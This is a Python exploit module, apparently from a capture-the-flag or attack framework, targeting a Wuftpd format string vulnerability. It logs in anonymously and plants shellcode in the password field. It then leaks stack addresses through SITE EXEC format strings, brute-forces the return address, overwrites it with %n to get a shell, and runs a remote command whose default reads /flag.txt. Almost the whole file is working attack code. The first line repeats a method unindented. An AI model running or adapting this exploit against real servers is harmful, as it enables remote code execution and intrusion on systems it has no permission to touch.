def set_up(self): self.eggm = EggManager(shellcode,390) pass
class FTPFormatString(Exploit):
MAX_ITERATION = 50
def __init__(self):
Exploit.__init__(self,'Wuftpd format string', desc)
self.add_param(StringParam('RESULT','well done','The string that must be present in the result if the attack is successful'))
self.add_param(StringParam('CMD','cat /flag.txt', 'The command to be executed on the remote host'))
self.eggm = None
self.res = ''
def set_up(self):
self.eggm = EggManager(shellcode,390)
pass
def execute(self):
#self.eggm = EggManager(shellcode,390)
self.res = ""
ftpm = ftp.FTPManager()
if ftpm.connect()==False:
raise ServiceDown()
self.log.info("Sending login...")
if (ftpm.send_cmd('user anonymous')==False):
raise ExploitError('Connection error')
self.log.debug('Banner: %s'%ftpm.welcome)
resp = ftpm.get_ftp_response()
self.log.debug('Received: %s'%resp)
if ('331' in resp)==False:
raise ExploitError('Unable to log-in')
egg = self.eggm.get_egg()
passwd = ftp.FTPCommand('pass',[egg])
ftpm.send_cmd(passwd)
resp = ftpm.get_ftp_response()
self.log.debug('Received: %s'%resp)
if ('230' in resp)==False:
raise ExploitError('Unable to log-in')
self.log.info("Logged in (the egg is inside)")
ftpm.send_cmd("SITE EXEC exec %x %x %x %x +%x |%x")
reply = ftpm.get_ftp_response()
self.log.debug('Received: %s'%reply)
temp1 = string.index(reply,"|")
temp2 = string.index(reply,"+")
reta = long(reply[temp1+1:string.index(reply,"\n")],16)
retz = long(reply[temp2+1:temp1],16)
params = []
for i in range(89): params.append("%x")
params.append("|%x")
ftpm.send_cmd(ftp.FTPCommand("site exec",params))
reply = ftpm.get_ftp_response()
retb = long(reply[string.index(reply,"|")+1 : string.index(reply,"\n")],16)
add = 0
if reta == 0:
reta = retz
else:
add = 600
reta = reta - 0x58
retb = retb +100 -0x2569 - add;
self.log.debug(" reta = %x\r\n retz = %x\r\n retb = %x"%(reta,retz,retb))
self.log.info(" Finding return address....")
counter = 22
st = 0
while(counter<22+self.MAX_ITERATION):
params = ["kkkkkkkkkkkkkkkkkkkkkkkkkkbbbb%c%c\xff%c%c"%\
(reta & 0xff,\
(reta & 0xff00) >> 8,\
(reta & 0xff0000) >> 16,\
(reta & 0xff000000) >> 24)]
for i in range(129):
params.append("%f")
for i in range(counter+1):
params.append("%d")
params.append("|%x|%x")
ftpm.send_cmd("SITE EXEC "+string.join(params,""))
reply = ftpm.get_ftp_response()
temp1 = string.index(reply,"|")
temp2 = string.index(reply,"|",temp1+1)
val = long(reply[temp1+1 : temp2],16)
self.log.debug(" address = %x (I'm looking for %x)"%(val,reta))
if (val != 0):
if (val == reta):
st = 1
break
counter = counter+1
if counter==22+self.MAX_ITERATION:
self.log.warning("Attack failed. I cannot find the return address")
return
self.log.debug("Return address found after %d iterations"%(counter-22+1))
params = ["kkkkkkkkkkkkkkkkkkkkkkkkkkbbbb%c%c\xff%c%c"%\
(reta & 0xff,\
(reta & 0xff00) >> 8,\
(reta & 0xff0000) >> 16,\
(reta & 0xff000000) >> 24)]
for i in range(129):
params.append("%.f")
for i in range(counter):
params.append("%d")
if(add == 600):
params.append("|%%.%ud%%n"%(retb+9807))
else:
params.append("|%%.%ud%%n"%(retb+9807-480))
ftpm.send_cmd("SITE EXEC "+string.join(params,""))
self.log.info("Waiting for a shell....")
time.sleep(2)
self.log.info("Sending command")
ftpm.send_raw(self.CMD+"\n")
temp = ftpm.sock.readline('\n',blocking=True)
self.log.debug('Received: %s'%temp)
self.res = ftpm.sock.readline('\n',blocking=True)
self.log.debug("Result %r"%self.res)
def isSuccessful(self):
if self.RESULT in self.res:
return exploit.RES_OK
else:
return exploit.RES_FAIL
